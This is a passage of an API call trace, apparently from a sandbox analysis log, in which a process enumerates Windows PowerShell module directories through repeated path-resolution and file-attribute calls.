lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x3f [0263.089] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\BranchCache", nBufferLength=0x3f, lpBuffer=0x1a83e800, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\BranchCache", lpFilePart=0x0) returned 0x3e [0263.089] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b83e3c8) returned 1 [0263.089] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\BranchCache" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\branchcache"), fInfoLevelId=0x0, lpFileInformation=0x1b83e6f0 | out: lpFileInformation=0x1b83e6f0*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x6d90540, ftCreationTime.dwHighDateTime=0x1d5ace4, ftLastAccessTime.dwLowDateTime=0x1fc2682, ftLastAccessTime.dwHighDateTime=0x1d942b2, ftLastWriteTime.dwLowDateTime=0x744502b, ftLastWriteTime.dwHighDateTime=0x1d5ace4, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 1 [0263.089] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b83e378) returned 1 [0263.089] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\CimCmdlets", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x3e [0263.089] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\CimCmdlets", nBufferLength=0x3e, lpBuffer=0x1a83e800, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\CimCmdlets", lpFilePart=0x0) returned 0x3d [0263.089] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b83e3c8) returned 1 [0263.089] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\CimCmdlets" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\cimcmdlets"), fInfoLevelId=0x0, lpFileInformation=0x1b83e6f0 | out: lpFileInformation=0x1b83e6f0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc89b8c5c, ftCreationTime.dwHighDateTime=0x1d5acde, ftLastAccessTime.dwLowDateTime=0x1fc2682, ftLastAccessTime.dwHighDateTime=0x1d942b2, ftLastWriteTime.dwLowDateTime=0xcbd930d4, ftLastWriteTime.dwHighDateTime=0x1d5acde, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 1 [0263.089] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b83e378) returned 1 [0263.090] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\ConfigCI", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x3c [0263.090] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\ConfigCI", nBufferLength=0x3c, lpBuffer=0x1a83e800, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\ConfigCI", lpFilePart=0x0) returned 0x3b [0263.090] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b83e3c8) returned 1 [0263.090] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\ConfigCI" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\configci"), fInfoLevelId=0x0, lpFileInformation=0x1b83e6f0 | out: lpFileInformation=0x1b83e6f0*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x6d90540, ftCreationTime.dwHighDateTime=0x1d5ace4, ftLastAccessTime.dwLowDateTime=0x1fc2682, ftLastAccessTime.dwHighDateTime=0x1d942b2, ftLastWriteTime.dwLowDateTime=0x744502b, ftLastWriteTime.dwHighDateTime=0x1d5ace4, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 1 [0263.090] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b83e378) returned 1 [0263.090] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Defender", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x3c [0263.090] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Defender", nBufferLength=0x3c, lpBuffer=0x1a83e800, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Defender", lpFilePart=0x0) returned 0x3b [0263.090] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b83e3c8) returned 1 [0263.090] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Defender" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\defender"), fInfoLevelId=0x0, lpFileInformation=0x1b83e6f0 | out: lpFileInformation=0x1b83e6f0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc89b8c5c, ftCreationTime.dwHighDateTime=0x1d5acde, ftLastAccessTime.dwLowDateTime=0x1fc2682, ftLastAccessTime.dwHighDateTime=0x1d942b2, ftLastWriteTime.dwLowDateTime=0xbe00174, ftLastWriteTime.dwHighDateTime=0x1d5ace1, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 1 [0263.091] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b83e378) returned 1 [0263.091] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\DeliveryOptimization", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x48 [0263.091] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\DeliveryOptimization", nBufferLength=0x48, lpBuffer=0x1a83e800, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\DeliveryOptimization", lpFilePart=0x0) returned 0x47 [0263.091] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b83e3c8) returned 1 [0263.091] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\DeliveryOptimization" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\deliveryoptimization"), fInfoLevelId=0x0, lpFileInformation=0x1b83e6f0 | out: lpFileInformation=0x1b83e6f0*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc89b8c5c, ftCreationTime.dwHighDateTime=0x1d5acde, ftLastAccessTime.dwLowDateTime=0x1fc2682, ftLastAccessTime.dwHighDateTime=0x1d942b2, ftLastWriteTime.dwLowDateTime=0xcbd930d4, ftLastWriteTime.dwHighDateTime=0x1d5acde, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 1 [0263.091] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b83e378) returned 1 [0263.091] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\DirectAccessClientComponents", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x50 [0263.092] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\DirectAccessClientComponents", nBufferLength=0x50, lpBuffer=0x1a83e800, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\DirectAccessClientComponents", lpFilePart=0x0) returned 0x4f [0263.092] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b83e3c8) returned 1 [0263.092] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\DirectAccessClientComponents" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\directaccessclientcomponents"), fInfoLevelId=0x0, lpFileInformation=0x1b83e6f0 | out: lpFileInformation=0x1b83e6f0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc89b8c5c, ftCreationTime.dwHighDateTime=0x1d5acde, ftLastAccessTime.dwLowDateTime=0x1fc2682, ftLastAccessTime.dwHighDateTime=0x1d942b2, ftLastWriteTime.dwLowDateTime=0xcbd930d4, ftLastWriteTime.dwHighDateTime=0x1d5acde, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 1 [0263.092] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b83e378) returned 1 [0263.092] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Dism", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x38 [0263.092] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Dism", nBufferLength=0x38, lpBuffer=0x1a83e800, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Dism", lpFilePart=0x0) returned 0x37 [0263.092] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b83e3c8) returned 1 [0263.092] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Dism" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\dism"), fInfoLevelId=0x0, lpFileInformation=0x1b83e6f0 | out: lpFileInformation=0x1b83e6f0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc89b8c5c, ftCreationTime.dwHighDateTime=0x1d5acde, ftLastAccessTime.dwLowDateTime=0x1fc2682, ftLastAccessTime.dwHighDateTime=0x1d942b2, ftLastWriteTime.dwLowDateTime=0xa16872ee, ftLastWriteTime.dwHighDateTime=0x1d5ace3, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 1 [0263.092] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b83e378) returned 1 [0263.093] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\DnsClient", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x3d [0263.093] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\DnsClient", nBufferLength=0x3d, lpBuffer=0x1a83e800, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\DnsClient", lpFilePart=0x0) returned 0x3c [0263.093] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b83e3c8) returned 1 [0263.093] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\DnsClient" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\dnsclient"), fInfoLevelId=0x0, lpFileInformation=0x1b83e6f0 | out: lpFileInformation=0x1b83e6f0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc89b8c5c, ftCreationTime.dwHighDateTime=0x1d5acde, ftLastAccessTime.dwLowDateTime=0x1fc2682, ftLastAccessTime.dwHighDateTime=0x1d942b2, ftLastWriteTime.dwLowDateTime=0xcbdbb8b3, ftLastWriteTime.dwHighDateTime=0x1d5acde, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 1 [0263.093] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b83e378) returned 1 [0263.093] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\EventTracingManagement", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x4a [0263.093] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\EventTracingManagement", nBufferLength=0x4a, lpBuffer=0x1a83e800, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\EventTracingManagement", lpFilePart=0x0) returned 0x49 [0263.093] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b83e3c8) returned 1 [0263.093] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\EventTracingManagement" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\eventtracingmanagement"), fInfoLevelId=0x0, lpFileInformation=0x1b83e6f0 | out: lpFileInformation=0x1b83e6f0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc89b8c5c, ftCreationTime.dwHighDateTime=0x1d5acde, ftLastAccessTime.dwLowDateTime=0x1fc2682, ftLastAccessTime.dwHighDateTime=0x1d942b2, ftLastWriteTime.dwLowDateTime=0xcbdbb8b3, ftLastWriteTime.dwHighDateTime=0x1d5acde, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 1 [0263.093] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b83e378) returned 1 [0263.094] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\International", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x41 [0263.094] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\International", nBufferLength=0x41, lpBuffer=0x1a83e800, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\International", lpFilePart=0x0) returned 0x40 [0263.094] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b83e3c8) returned 1 [0263.094] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\International" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\international"), fInfoLevelId=0x0, lpFileInformation=0x1b83e6f0 | out: lpFileInformation=0x1b83e6f0*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc89b8c5c, ftCreationTime.dwHighDateTime=0x1d5acde, ftLastAccessTime.dwLowDateTime=0x1fc2682, ftLastAccessTime.dwHighDateTime=0x1d942b2, ftLastWriteTime.dwLowDateTime=0xcbdbb8b3, ftLastWriteTime.dwHighDateTime=0x1d5acde, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 1 [0263.094] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b83e378) returned 1 [0263.094] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\iSCSI", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x39 [0263.094] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\iSCSI", nBufferLength=0x39, lpBuffer=0x1a83e800, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\iSCSI", lpFilePart=0x0) returned 0x38 [0263.094] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b83e3c8) returned 1 [0263.094] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\iSCSI" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\iscsi"), fInfoLevelId=0x0, lpFileInformation=0x1b83e6f0 | out: lpFileInformation=0x1b83e6f0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc89b8c5c, ftCreationTime.dwHighDateTime=0x1d5acde, ftLastAccessTime.dwLowDateTime=0x1fc2682, ftLastAccessTime.dwHighDateTime=0x1d942b2, ftLastWriteTime.dwLowDateTime=0xcbdbb8b3, ftLastWriteTime.dwHighDateTime=0x1d5acde, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 1 [0263.094] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b83e378) returned 1 [0263.095] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\ISE", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x37 [0263.095] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\ISE", nBufferLength=0x37, lpBuffer=0x1a83e800, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\ISE", lpFilePart=0x0) returned 0x36 [0263.095] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b83e3c8) returned 1 [0263.095] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\ISE" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\ise"), fInfoLevelId=0x0, lpFileInformation=0x1b83e6f0 | out: lpFileInformation=0x1b83e6f0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf00bc16c, ftCreationTime.dwHighDateTime=0x1d5ace3, ftLastAccessTime.dwLowDateTime=0x1fc2682, ftLastAccessTime.dwHighDateTime=0x1d942b2, ftLastWriteTime.dwLowDateTime=0xf00bc16c, ftLastWriteTime.dwHighDateTime=0x1d5ace3, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 1 [0263.095] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b83e378) returned 1 [0263.095] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Kds", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x37 [0263.095] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Kds", nBufferLength=0x37, lpBuffer=0x1a83e800, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Kds", lpFilePart=0x0) returned 0x36 [0263.095] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b83e3c8) returned 1 [0263.095] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Kds" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\kds"), fInfoLevelId=0x0, lpFileInformation=0x1b83e6f0 | out: lpFileInformation=0x1b83e6f0*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc89b8c5c, ftCreationTime.dwHighDateTime=0x1d5acde, ftLastAccessTime.dwLowDateTime=0x1fc2682, ftLastAccessTime.dwHighDateTime=0x1d942b2, ftLastWriteTime.dwLowDateTime=0xa16872ee, ftLastWriteTime.dwHighDateTime=0x1d5ace3, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 1 [0263.095] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b83e378) returned 1 [0263.096] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Archive", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x50 [0263.096] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Archive", nBufferLength=0x50, lpBuffer=0x1a83e800, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Archive", lpFilePart=0x0) returned 0x4f [0263.096] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b83e3c8) returned 1 [0263.096] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Archive" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\microsoft.powershell.archive"), fInfoLevelId=0x0, lpFileInformation=0x1b83e6f0 | out: lpFileInformation=0x1b83e6f0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc89b8c5c, ftCreationTime.dwHighDateTime=0x1d5acde, ftLastAccessTime.dwLowDateTime=0x1fc2682, ftLastAccessTime.dwHighDateTime=0x1d942b2, ftLastWriteTime.dwLowDateTime=0xa16872ee, ftLastWriteTime.dwHighDateTime=0x1d5ace3, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 1 [0263.096] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b83e378) returned 1 [0263.096] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Diagnostics", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x54 [0263.096] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Diagnostics", nBufferLength=0x54, lpBuffer=0x1a83e800, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Diagnostics", lpFilePart=0x0) returned 0x53 [0263.096] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b83e3c8) returned 1 [0263.096] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Diagnostics" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\microsoft.powershell.diagnostics"), fInfoLevelId=0x0, lpFileInformation=0x1b83e6f0 | out: lpFileInformation=0x1b83e6f0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc89b8c5c, ftCreationTime.dwHighDateTime=0x1d5acde, ftLastAccessTime.dwLowDateTime=0x1fc2682, ftLastAccessTime.dwHighDateTime=0x1d942b2, ftLastWriteTime.dwLowDateTime=0xcbddf8a3, ftLastWriteTime.dwHighDateTime=0x1d5acde, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 1 [0263.097] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b83e378) returned 1 [0263.097] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Host", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x4d [0263.097] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Host", nBufferLength=0x4d, lpBuffer=0x1a83e800, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Host", lpFilePart=0x0) returned 0x4c [0263.097] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b83e3c8) returned 1 [0263.097] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Host" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\microsoft.powershell.host"), fInfoLevelId=0x0, lpFileInformation=0x1b83e6f0 | out: lpFileInformation=0x1b83e6f0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc89b8c5c, ftCreationTime.dwHighDateTime=0x1d5acde, ftLastAccessTime.dwLowDateTime=0x1fc2682, ftLastAccessTime.dwHighDateTime=0x1d942b2, ftLastWriteTime.dwLowDateTime=0xcbddf8a3, ftLastWriteTime.dwHighDateTime=0x1d5acde, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 1 [0263.097] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b83e378) returned 1 [0263.097] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.LocalAccounts", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x56 [0263.097] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.LocalAccounts", nBufferLength=0x56, lpBuffer=0x1a83e800, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.LocalAccounts", lpFilePart=0x0) returned 0x55 [0263.098] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b83e3c8) returned 1 [0263.098] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.LocalAccounts" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\microsoft.powershell.localaccounts"), fInfoLevelId=0x0, lpFileInformation=0x1b83e6f0 | out: lpFileInformation=0x1b83e6f0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc89b8c5c, ftCreationTime.dwHighDateTime=0x1d5acde, ftLastAccessTime.dwLowDateTime=0x1fc2682, ftLastAccessTime.dwHighDateTime=0x1d942b2, ftLastWriteTime.dwLowDateTime=0xbe25506, ftLastWriteTime.dwHighDateTime=0x1d5ace1, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 1 [0263.098] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b83e378) returned 1 [0263.098] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Management", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x53 [0263.098] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Management", nBufferLength=0x53, lpBuffer=0x1a83e800, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Management", lpFilePart=0x0) returned 0x52 [0263.098] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b83e3c8) returned 1 [0263.098] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Management" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\microsoft.powershell.management"), fInfoLevelId=0x0, lpFileInformation=0x1b83e6f0 | out: lpFileInformation=0x1b83e6f0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc89b8c5c, ftCreationTime.dwHighDateTime=0x1d5acde, ftLastAccessTime.dwLowDateTime=0xa7ca8e4b, ftLastAccessTime.dwHighDateTime=0x1d9a995, ftLastWriteTime.dwLowDateTime=0xcbddf8a3, ftLastWriteTime.dwHighDateTime=0x1d5acde, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 1 [0263.098] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b83e378) returned 1 [0263.099] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.ODataUtils", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x53 [0263.099] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.ODataUtils", nBufferLength=0x53, lpBuffer=0x1a83e800, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.ODataUtils", lpFilePart=0x0) returned 0x52 [0263.099] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b83e3c8) returned 1 [0263.099] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.ODataUtils" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\microsoft.powershell.odatautils"), fInfoLevelId=0x0, lpFileInformation=0x1b83e6f0 | out: lpFileInformation=0x1b83e6f0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc89b8c5c, ftCreationTime.dwHighDateTime=0x1d5acde, ftLastAccessTime.dwLowDateTime=0x1fc2682, ftLastAccessTime.dwHighDateTime=0x1d942b2, ftLastWriteTime.dwLowDateTime=0xa16872ee, ftLastWriteTime.dwHighDateTime=0x1d5ace3, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 1 [0263.101] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b83e378) returned 1 [0263.101] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Security", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x51 [0263.101] 